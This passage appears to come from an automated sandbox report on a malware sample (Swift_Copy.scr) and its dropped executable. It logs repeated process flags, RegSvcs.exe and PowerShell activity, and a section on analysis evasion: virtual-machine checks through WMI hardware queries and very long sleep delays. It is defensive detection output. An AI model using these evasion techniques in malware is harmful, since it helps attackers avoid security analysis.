                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: Swift_Copy.scr PID: 4592, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: WAuLmtFUmD.exe PID: 5960, type: MEMORYSTR
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\Swift_Copy.scrMemory allocated: 18E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrMemory allocated: 33B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrMemory allocated: 53B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrMemory allocated: 9330000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrMemory allocated: A330000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrMemory allocated: A530000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrMemory allocated: B530000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrMemory allocated: BC50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrMemory allocated: 9330000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeMemory allocated: 1540000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeMemory allocated: 3330000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeMemory allocated: 18A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeMemory allocated: 8B20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeMemory allocated: 9B20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeMemory allocated: 9D00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeMemory allocated: AD00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeMemory allocated: B3F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeMemory allocated: C3F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeMemory allocated: D3F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7705Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1947Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 710Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1879Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1841Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7817Jump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scr TID: 4308Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5832Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6132Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe TID: 1772Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\Swift_Copy.scrThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99869Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99641Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99530Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99422Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99313Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99188Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99074Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98969Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98853Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98625Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98516Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99649Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99326Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99215Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98752Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98625Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98515Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98405Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98295Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98187Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98066Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97953Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97835Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97734Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97622Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97475Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97374Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97265Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97156Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97046Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96936Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96811Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96703Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96593Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96484Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96374Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96265Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96156Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96046Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95937Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95827Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95603Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95500Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95390Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95281Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94110Jump to behavior
